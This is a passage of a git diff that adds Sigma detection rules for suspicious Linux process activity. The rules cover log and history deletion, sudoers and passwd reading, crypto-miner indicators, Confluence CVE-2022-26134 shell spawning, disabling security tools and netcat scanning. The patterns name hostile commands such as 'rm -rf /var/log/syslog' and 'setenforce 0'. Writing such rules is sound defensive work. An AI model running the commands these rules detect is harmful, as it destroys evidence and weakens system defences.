CommandLine|contains: '-d' + condition: selection +falsepositives: + - Legitimate activities +level: low +tags: + - attack.defense_evasion + - attack.t1027 diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml new file mode 100644 index 000000000..a0c4b717f --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml @@ -0,0 +1,23 @@ +title: BPFtrace Unsafe Option Usage +id: f8341cb2-ee25-43fa-a975-d8a5a9714b39 +status: experimental +description: Detects the usage of the unsafe bpftrace option +author: Andreas Hunkeler (@Karneades) +tags: + - attack.execution + - attack.t1059.004 +references: + - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/ + - https://bpftrace.org/ +date: 2022/02/11 +logsource: + category: process_creation + product: linux +detection: + selection1: + Image|endswith: 'bpftrace' + CommandLine|contains: '--unsafe' + condition: selection1 +falsepositives: + - Legitimate usage of the unsafe option +level: medium diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml new file mode 100644 index 000000000..83e0dda21 --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml @@ -0,0 +1,24 @@ +title: Cat Sudoers +id: 0f79c4d2-4e1f-4683-9c36-b5469a665e06 +status: test +description: Detects the execution of a cat /etc/sudoers to list all users that have sudo rights +author: Florian Roth +references: + - https://github.com/sleventyeleven/linuxprivchecker/ +date: 2022/06/20 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: + - '/cat' + - 'grep' + CommandLine|contains: ' /etc/sudoers' + condition: selection +falsepositives: + - Legitimate administration activities +level: medium +tags: + - attack.reconnaissance + - attack.t1592.004 diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml new file mode 100644 index 000000000..39899711a --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml @@ -0,0 +1,26 @@ +title: Clear Linux Logs +id: 80915f59-9b56-4616-9de0-fd0dea6c12fe +status: stable +description: Detects clear logs +author: Ömer Günal, oscd.community +date: 2020/10/07 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md +logsource: + product: linux + category: process_creation +detection: + selection: + Image|endswith: + - '/rm' # covers /rmdir as well + - '/shred' + CommandLine|contains: + - '/var/log' + - '/var/spool/mail' + condition: selection +falsepositives: + - Legitimate administration activities +level: medium +tags: + - attack.defense_evasion + - attack.t1070.002 diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml new file mode 100644 index 000000000..d826716e2 --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml @@ -0,0 +1,28 @@ +title: Commands to Clear or Remove the Syslog +id: 3fcc9b35-39e4-44c0-a2ad-9e82b6902b31 +status: experimental +description: Detects specific commands commonly used to remove or empty the syslog. +date: 2021/10/15 +author: Max Altgelt, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.impact + - attack.t1565.001 +references: + - https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_clear_syslog.yml +logsource: + product: linux + category: process_creation +detection: + selection: + CommandLine|contains: + - 'rm /var/log/syslog' + - 'rm -r /var/log/syslog' + - 'rm -f /var/log/syslog' + - 'rm -rf /var/log/syslog' + - 'mv /var/log/syslog' + - ' >/var/log/syslog' + - ' > /var/log/syslog' + condition: selection +falsepositives: + - Log rotation. +level: high diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml new file mode 100644 index 000000000..d585fc36c --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml @@ -0,0 +1,31 @@ +title: Clipboard Collection with Xclip Tool +id: ec127035-a636-4b9a-8555-0efd4e59f316 +status: experimental +description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. +date: 2021/10/15 +author: Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.impact + - attack.t1485 +references: + - https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_clipboard_collection.yml +logsource: + product: linux + category: process_creation +detection: + selection1: + Image|contains: 'xclip' + selection2: + CommandLine|contains: + - '-selection' + - '-sel' + selection3: + CommandLine|contains: + - 'clipboard' + - 'clip' + selection4: + CommandLine|contains: '-o' + condition: selection1 and selection2 and selection3 and selection4 +falsepositives: + - Legitimate usage of xclip tools. +level: low diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml new file mode 100644 index 000000000..6662c9e40 --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml @@ -0,0 +1,38 @@ +title: Linux Crypto Mining Indicators +id: 9069ea3c-b213-4c52-be13-86506a227ab1 +status: experimental +description: Detects command line parameters or strings often used by crypto miners +references: + - https://www.poolwatch.io/coin/monero +date: 2021/10/26 +author: Florian Roth +logsource: + product: linux + category: process_creation +detection: + selection: + CommandLine|contains: + - ' --cpu-priority=' + - '--donate-level=0' + - ' -o pool.' + - ' --nicehash' + - ' --algo=rx/0 ' + - 'stratum+tcp://' + - 'stratum+udp://' + # Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives + - 'sh -c /sbin/modprobe msr allow_writes=on' + # base64 encoded: --donate-level= + - 'LS1kb25hdGUtbGV2ZWw9' + - '0tZG9uYXRlLWxldmVsP' + - 'tLWRvbmF0ZS1sZXZlbD' + # base64 encoded: stratum+tcp:// and stratum+udp:// + - 'c3RyYXR1bSt0Y3A6Ly' + - 'N0cmF0dW0rdGNwOi8v' + - 'zdHJhdHVtK3RjcDovL' + - 'c3RyYXR1bSt1ZHA6Ly' + - 'N0cmF0dW0rdWRwOi8v' + - 'zdHJhdHVtK3VkcDovL' + condition: selection +falsepositives: + - Legitimate use of crypto miners +level: high diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml new file mode 100644 index 000000000..8fa4944dc --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml @@ -0,0 +1,40 @@ +title: Atlassian Confluence CVE-2022-26134 +id: 7fb14105-530e-4e2e-8cfb-99f7d8700b66 +status: experimental +description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134 +author: Nasreddine Bencherchali +date: 2022/06/03 +related: + - id: 245f92e3-c4da-45f1-9070-bc552e06db11 + type: derived +references: + - https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/ +tags: + - attack.initial_access + - attack.execution + - attack.t1190 + - attack.t1059 + - cve.2022.26134 +logsource: + category: process_creation + product: linux +detection: + selection: + # Monitor suspicious child processes spawned by Confluence + ParentImage|startswith: '/opt/atlassian/confluence/' + ParentImage|endswith: '/java' + CommandLine|contains: + - '/bin/sh' + - 'bash' + - 'dash' + - 'ksh' + - 'zsh' + - 'csh' + - 'fish' + - 'curl' + - 'wget' + - 'python' + condition: selection +falsepositives: + - Unknown +level: high diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml new file mode 100644 index 000000000..f6eb7104a --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml @@ -0,0 +1,29 @@ +title: DD File Overwrite +id: 2953194b-e33c-4859-b9e8-05948c167447 +status: experimental +description: Detects potential overwriting and deletion of a file using DD. +date: 2021/10/15 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.impact + - attack.t1485 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd +logsource: + product: linux + category: process_creation +detection: + selection1: + Image: + - '/bin/dd' + - '/usr/bin/dd' + selection2: + CommandLine|contains: 'of=' + selection3: + CommandLine|contains: + - 'if=/dev/zero' + - 'if=/dev/null' + condition: selection1 and selection2 and selection3 +falsepositives: + - Any user deleting files that way. +level: low diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml new file mode 100644 index 000000000..c47444781 --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml @@ -0,0 +1,22 @@ +title: Linux Doas Tool Execution +id: 067d8238-7127-451c-a9ec-fa78045b618b +status: stable +description: Detects the doas tool execution in linux host platform. +references: + - https://research.splunk.com/endpoint/linux_doas_tool_execution/ + - https://www.makeuseof.com/how-to-install-and-use-doas/ +author: Sittikorn S, Teoderick Contreras +date: 2022/01/20 +tags: + - attack.privilege_escalation + - attack.t1548 +logsource: + product: linux + category: process_creation +detection: + selection: + Image|endswith: '/doas' + condition: selection +falsepositives: + - Unlikely +level: low diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml new file mode 100644 index 000000000..ca2781257 --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml @@ -0,0 +1,30 @@ +title: File and Directory Discovery +id: d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72 +status: test +description: Detects usage of system utilities to discover files and directories +author: Daniil Yugoslavskiy, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md +date: 2020/10/19 +modified: 2021/11/27 +logsource: + category: process_creation + product: linux +detection: + select_file_with_asterisk: + Image|endswith: '/file' + CommandLine|re: '(.){200,}' # execution of the 'file */* *>> /tmp/output.txt' will produce huge commandline + select_recursive_ls: + Image|endswith: '/ls' + CommandLine|contains: '-R' + select_find_execution: + Image|endswith: '/find' + select_tree_execution: + Image|endswith: '/tree' + condition: 1 of select* +falsepositives: + - Legitimate activities +level: informational +tags: + - attack.discovery + - attack.t1083 diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml new file mode 100644 index 000000000..391975730 --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml @@ -0,0 +1,23 @@ +title: File Deletion +id: 30aed7b6-d2c1-4eaf-9382-b6bc43e50c57 +status: stable +description: Detects file deletion commands +author: Ömer Günal, oscd.community +date: 2020/10/07 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md +logsource: + product: linux + category: process_creation +detection: + selection: + Image|endswith: + - '/rm' # covers /rmdir as well + - '/shred' + condition: selection +falsepositives: + - Legitimate administration activities +level: informational +tags: + - attack.defense_evasion + - attack.t1070.004 diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml new file mode 100644 index 000000000..e1e66a138 --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml @@ -0,0 +1,24 @@ +title: Install Root Certificate +id: 78a80655-a51e-4669-bc6b-e9d206a462ee +status: test +description: Detects installed new certificate +author: Ömer Günal, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md +date: 2020/10/05 +modified: 2021/11/27 +logsource: + product: linux + category: process_creation +detection: + selection: + Image|endswith: + - '/update-ca-certificates' + - '/update-ca-trust' + condition: selection +falsepositives: + - Legitimate administration activities +level: low +tags: + - attack.defense_evasion + - attack.t1553.004 diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_local_account.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_local_account.yml new file mode 100644 index 000000000..2b1791a11 --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_local_account.yml @@ -0,0 +1,34 @@ +title: Local System Accounts Discovery +id: b45e3d6f-42c6-47d8-a478-df6bd6cf534c +status: test +description: Detects enumeration of local systeam accounts +author: Alejandro Ortuno, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md +date: 2020/10/08 +modified: 2021/11/27 +logsource: + category: process_creation + product: linux +detection: + selection_1: + Image|endswith: '/lastlog' + selection_2: + CommandLine|contains: '''x:0:''' + selection_3: + Image|endswith: '/cat' + CommandLine|contains: + - '/etc/passwd' + - '/etc/sudoers' + selection_4: + Image|endswith: '/id' + selection_5: + Image|endswith: '/lsof' + CommandLine|contains: '-u' + condition: 1 of selection* +falsepositives: + - Legitimate administration activities +level: low +tags: + - attack.discovery + - attack.t1087.001 diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_local_groups.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_local_groups.yml new file mode 100644 index 000000000..5ba646c21 --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_local_groups.yml @@ -0,0 +1,25 @@ +title: Local Groups Discovery +id: 676381a6-15ca-4d73-a9c8-6a22e970b90d +status: test +description: Detects enumeration of local system groups +author: Ömer Günal, Alejandro Ortuno, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md +date: 2020/10/11 +modified: 2021/11/27 +logsource: + category: process_creation + product: linux +detection: + selection_1: + Image|endswith: '/groups' + selection_2: + Image|endswith: '/cat' + CommandLine|contains: '/etc/group' + condition: 1 of selection* +falsepositives: + - Legitimate administration activities +level: low +tags: + - attack.discovery + - attack.t1069.001 diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_network_service_scanning.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_network_service_scanning.yml new file mode 100644 index 000000000..dff9dc956 --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_network_service_scanning.yml @@ -0,0 +1,31 @@ +title: Linux Network Service Scanning +id: 3e102cd9-a70d-4a7a-9508-403963092f31 +status: experimental +description: Detects enumeration of local or remote network services. +author: Alejandro Ortuno, oscd.community +date: 2020/10/21 +modified: 2021/09/14 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md +tags: + - attack.discovery + - attack.t1046 +logsource: + category: process_creation + product: linux + definition: 'Detect netcat and filter our listening mode' +detection: + netcat: + Image|endswith: + - '/nc' + - '/netcat' + network_scanning_tools: + Image|endswith: + - '/telnet' # could be wget, curl, ssh, many things. basically everything that is able to do network connection. consider fine tuning + - '/nmap' + netcat_listen_flag: + CommandLine|contains: 'l' + condition: (netcat and not netcat_listen_flag) or network_scanning_tools +falsepositives: + - Legitimate administration activities +level: low diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_nohup.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_nohup.yml new file mode 100644 index 000000000..1b8abaea7 --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_nohup.yml @@ -0,0 +1,20 @@ +title: Nohup Execution +id: e4ffe466-6ff8-48d4-94bd-e32d1a6061e2 +status: experimental +description: Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments +author: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io' +references: + - https://gtfobins.github.io/gtfobins/nohup/ + - https://en.wikipedia.org/wiki/Nohup + - https://www.computerhope.com/unix/unohup.htm +date: 2022/06/06 +logsource: + product: linux + category: process_creation +detection: + selection: + Image|endswith: '/nohup' + condition: selection +falsepositives: + - Administrators or installed processes that leverage nohup +level: medium diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml new file mode 100644 index 000000000..90ed0cf16 --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml @@ -0,0 +1,30 @@ +title: OMIGOD SCX RunAsProvider ExecuteScript +id: 6eea1bf6-f8d2-488a-a742-e6ef6c1b67db +status: experimental +description: Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite. +date: 2021/10/15 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.privilege_escalation + - attack.initial_access + - attack.execution + - attack.t1068 + - attack.t1190 + - attack.t1203 +references: + - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure + - https://github.com/Azure/Azure-Sentinel/pull/3059 + - https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executescript.yml +logsource: + product: linux + category: process_creation +detection: + selection: + User: root + LogonId: '0' + CurrentDirectory: '/var/opt/microsoft/scx/tmp' + CommandLine|contains: '/etc/opt/microsoft/scx/conf/tmpdir/scx' + condition: selection +falsepositives: + - Legitimate use of SCX RunAsProvider ExecuteScript. +level: high diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml new file mode 100644 index 000000000..50d18a1dd --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml @@ -0,0 +1,30 @@ +title: OMIGOD SCX RunAsProvider ExecuteShellCommand +id: 21541900-27a9-4454-9c4c-3f0a4240344a +status: experimental +description: Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite. +date: 2021/10/15 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.privilege_escalation + - attack.initial_access + - attack.execution + - attack.t1068 + - attack.t1190 + - attack.t1203 +references: + - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure + - https://github.com/Azure/Azure-Sentinel/pull/3059 + - https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml +logsource: + product: linux + category: process_creation +detection: + selection: + User: root + LogonId: '0' + CurrentDirectory: '/var/opt/microsoft/scx/tmp' + CommandLine|contains: '/bin/sh' + condition: selection +falsepositives: + - Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand. +level: high diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_process_discovery.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_process_discovery.yml new file mode 100644 index 000000000..3dd32ec70 --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_process_discovery.yml @@ -0,0 +1,24 @@ +title: Process Discovery +id: 4e2f5868-08d4-413d-899f-dc2f1508627b +status: stable +description: Detects process discovery commands +author: Ömer Günal, oscd.community +date: 2020/10/06 +modified: 2021/08/14 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md +logsource: + product: linux + category: process_creation +detection: + selection: + Image|endswith: + - '/ps' + - '/top' + condition: selection +falsepositives: + - Legitimate administration activities +level: informational +tags: + - attack.discovery + - attack.t1057 diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml new file mode 100644 index 000000000..b56b56825 --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml @@ -0,0 +1,29 @@ +title: Python Spawning Pretty TTY +id: c4042d54-110d-45dd-a0e1-05c47822c937 +status: experimental +description: Detects python spawning a pretty tty +author: Nextron Systems +date: 2022/06/03 +references: + - https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/ +tags: + - attack.execution + - attack.t1059 +logsource: + category: process_creation + product: linux +detection: + selection_image: + Image|contains: + - '/python2.' # python image is always of the form ../python3.10; ../python is just a symlink + - '/python3.' + selection_cli1: + CommandLine|contains|all: + - 'import pty' + - '.spawn(' + selection_cli2: + CommandLine|contains: 'from pty import spawn' + condition: selection_image and 1 of selection_cli* +falsepositives: + - Unknown +level: high diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml new file mode 100644 index 000000000..c54f9d6f2 --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml @@ -0,0 +1,46 @@ +title: Linux Remote System Discovery +id: 11063ec2-de63-4153-935e-b1a8b9e616f1 +status: test +description: Detects the enumeration of other remote systems. +author: Alejandro Ortuno, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md +date: 2020/10/22 +modified: 2021/11/27 +logsource: + category: process_creation + product: linux +detection: + selection_1: + Image|endswith: '/arp' + CommandLine|contains: '-a' + selection_2: + Image|endswith: '/ping' + CommandLine|contains: + - ' 10.' #10.0.0.0/8 + - ' 192.168.' #192.168.0.0/16 + - ' 172.16.' #172.16.0.0/12 + - ' 172.17.' + - ' 172.18.' + - ' 172.19.' + - ' 172.20.' + - ' 172.21.' + - ' 172.22.' + - ' 172.23.' + - ' 172.24.' + - ' 172.25.' + - ' 172.26.' + - ' 172.27.' + - ' 172.28.' + - ' 172.29.' + - ' 172.30.' + - ' 172.31.' + - ' 127.' #127.0.0.0/8 + - ' 169.254.' #169.254.0.0/16 + condition: 1 of selection* +falsepositives: + - Legitimate administration activities +level: low +tags: + - attack.discovery + - attack.t1018 diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml new file mode 100644 index 000000000..0a78a6256 --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml @@ -0,0 +1,25 @@ +title: Scheduled Cron Task/Job +id: 6b14bac8-3e3a-4324-8109-42f0546a347f +status: test +description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder. +author: Alejandro Ortuno, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md +date: 2020/10/06 +modified: 2021/11/27 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: 'crontab' + CommandLine|contains: '/tmp/' + condition: selection +falsepositives: + - Legitimate administration activities +level: medium +tags: + - attack.execution + - attack.persistence + - attack.privilege_escalation + - attack.t1053.003 diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml new file mode 100644 index 000000000..dd93f19bd --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml @@ -0,0 +1,32 @@ +title: Security Software Discovery +id: c9d8b7fd-78e4-44fe-88f6-599135d46d60 +status: test +description: Detects usage of system utilities (only grep for now) to discover security software discovery +author: Daniil Yugoslavskiy, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md +date: 2020/10/19 +modified: 2021/11/27 +logsource: + category: process_creation + product: linux +detection: + grep_execution: + Image|endswith: '/grep' + security_services_and_processes: + CommandLine|contains: + - 'nessusd' # nessus vulnerability scanner + - 'td-agent' # fluentd log shipper + - 'packetbeat' # elastic network logger/shipper + - 'filebeat' # elastic log file shipper + - 'auditbeat' # elastic auditing agent/log shipper + - 'osqueryd' # facebook osquery + - 'cbagentd' # carbon black + - 'falcond' # crowdstrike falcon + condition: grep_execution and security_services_and_processes +falsepositives: + - Legitimate activities +level: low +tags: + - attack.discovery + - attack.t1518.001 diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml new file mode 100644 index 000000000..b82d1f331 --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml @@ -0,0 +1,83 @@ +title: Disabling Security Tools +id: e3a8a052-111f-4606-9aee-f28ebeb76776 +status: experimental +description: Detects disabling security tools +author: Ömer Günal, Alejandro Ortuno, oscd.community +date: 2020/06/17 +modified: 2021/09/14 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md +tags: + - attack.defense_evasion + - attack.t1562.004 +logsource: + category: process_creation + product: linux +detection: + selection_iptables_1: + Image|endswith: '/service' + CommandLine|contains|all: + - 'iptables' + - 'stop' + selection_iptables_2: + Image|endswith: '/service' + CommandLine|contains|all: + - 'ip6tables' + - 'stop' + selection_iptables_3: + Image|endswith: '/chkconfig' + CommandLine|contains|all: + - 'iptables' + - 'stop' + selection_iptables_4: + Image|endswith: '/chkconfig' + CommandLine|contains|all: + - 'ip6tables' + - 'stop' + selection_firewall_1: + Image|endswith: '/systemctl' + CommandLine|contains|all: + - 'firewalld' + - 'stop' + selection_firewall_2: + Image|endswith: '/systemctl' + CommandLine|contains|all: + - 'firewalld' + - 'disable' + selection_carbonblack_1: + Image|endswith: '/service' + CommandLine|contains|all: + - 'cbdaemon' + - 'stop' + selection_carbonblack_2: + Image|endswith: '/chkconfig' + CommandLine|contains|all: + - 'cbdaemon' + - 'off' + selection_carbonblack_3: + Image|endswith: '/systemctl' + CommandLine|contains|all: + - 'cbdaemon' + - 'stop' + selection_carbonblack_4: + Image|endswith: '/systemctl' + CommandLine|contains|all: + - 'cbdaemon' + - 'disable' + selection_selinux: + Image|endswith: '/setenforce' + CommandLine|contains: '0' + selection_crowdstrike_1: + Image|endswith: '/systemctl' + CommandLine|contains|all: + - 'stop' + - 'falcon-sensor' + selection_crowdstrike_2: + Image|endswith: '/systemctl' + CommandLine|contains|all: + - 'disable' + - 'falcon-sensor' + condition: 1 of selection* +falsepositives: + - Legitimate administration activities +level: medium diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml new file mode 100644 index 000000000..080bc6be2 --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml @@ -0,0 +1,27 @@ +title: Chmod Suspicious Directory +id: 6419afd1-3742-47a5-a7e6-b50386cd15f8 +status: experimental +description: Detects chmod targeting files in abnormal directory paths. +author: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io' +references: + - https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/ + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md +date: 2022/06/03 +logsource: + product: linux + category: process_creation +detection: + selection: + Image|endswith: '/chmod' + CommandLine|contains: + - '/tmp/' + - '/.Library/' + - '/etc/' + - '/opt/' + condition: selection +falsepositives: + - Admin changing file permissions. +level: medium +tags: + - attack.defense_evasion + - attack.t1222.002 diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml new file mode 100644 index 000000000..a9dc1f6ff --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml @@ -0,0 +1,26 @@ +title: History File Deletion +id: 1182f3b3-e716-4efa-99ab-d2685d04360f +status: experimental +description: Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity +author: Florian Roth +references: + - https://github.com/sleventyeleven/linuxprivchecker/ +date: 2022/06/20 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/rm' + selection_history: + - CommandLine|contains: + - '/.bash_history' + - '/.zsh_history' + - CommandLine|endswith: '_history' + condition: all of selection* +falsepositives: + - Legitimate administration activities +level: high +tags: + - attack.impact + - attack.t1565.001 diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml new file mode 100644 index 000000000..a91de0a28 --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml @@ -0,0 +1,26 @@ +title: Print History File Contents +id: d7821ff1-4527-4e33-9f84-d0d57fa2fb66 +status: experimental +description: Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance +author: Florian Roth +references: + - https://github.com/sleventyeleven/linuxprivchecker/ +date: 2022/06/20 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/cat' + selection_history: + - CommandLine|contains: + - '/.bash_history' + 